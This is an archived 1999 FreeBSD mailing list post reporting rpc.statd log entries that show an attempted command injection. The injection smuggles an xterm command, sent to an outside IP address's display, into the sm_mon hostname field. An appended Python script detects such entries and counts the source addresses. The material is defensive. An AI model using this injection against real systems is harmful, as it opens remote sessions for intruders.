From owner-freebsd-hackers Sat Feb 20 19:42:55 1999
Message-ID: <19990221141243.G93492@lemis.com>
Date: Sun, 21 Feb 1999 14:12:43 +1030
From: Greg Lehey
To: FreeBSD Hackers, FreeBSD-isp@freebsd.org
Subject: New breakin technique?
WWW-Home-Page: http://www.lemis.com/~grog
Organization: LEMIS, PO Box 460, Echunga SA 5153, Australia
Phone: +61-8-8388-8286
Fax: +61-8-8388-8725
Mobile: +61-41-739-7062
Sender: owner-freebsd-hackers@FreeBSD.ORG

I've just found the following messages in my logs:

Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0;

Has anybody seen something like this? It looks as if somebody is
trying to break in, but I didn't know that rpc.statd could start
xterms.

Under these circumstances, it would be interesting to know if
rpc.statd *must* run as root. Wouldn't, say, bin be enough?

Greg
--
See complete headers for address, home page and phone numbers
finger grog@lemis.com for PGP public key
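An added example, not part of the original message: a small scanner that picks out rpc.statd "Invalid hostname to sm_mon" entries whose rejected hostname contains shell metacharacters and tallies the remote X display addresses they name. The function names, the regular expressions and the choice of metacharacters are assumptions of this example; the sample input is the three log lines quoted in the message.

```python
import re
from collections import Counter

# The three log lines quoted in the message above.
SAMPLE_LOG = """\
Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0;
"""

# syslog prefix, then the rpc.statd rejection message and the rejected string.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<host>\S+)\srpc\.statd(?:\[\d+\])?:\s"
    r"Invalid hostname to sm_mon:\s(?P<name>.*)$"
)
# Characters that have no place in a hostname and that a shell would interpret.
SHELL_META = re.compile(r"[;|&`$<>(){}\\\s/]")
# Remote X display argument, as in the "-display a.b.c.d:0" seen in the log.
DISPLAY_RE = re.compile(r"-display\s+(\d{1,3}(?:\.\d{1,3}){3}):\d+")


def scan(log_text):
    """Return one finding per rejected sm_mon hostname containing shell metacharacters."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not SHELL_META.search(m["name"]):
            continue
        d = DISPLAY_RE.search(m["name"])
        findings.append({
            "time": m["ts"],
            "host": m["host"],
            "rejected": m["name"],
            "display_ip": d.group(1) if d else None,
        })
    return findings


def summarize(findings):
    """Count attempts per remote display address, for firewall or abuse follow-up."""
    return Counter(f["display_ip"] for f in findings if f["display_ip"])


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f['time']} {f['host']}: {f['rejected']!r}")
    print(dict(summarize(hits)))
```
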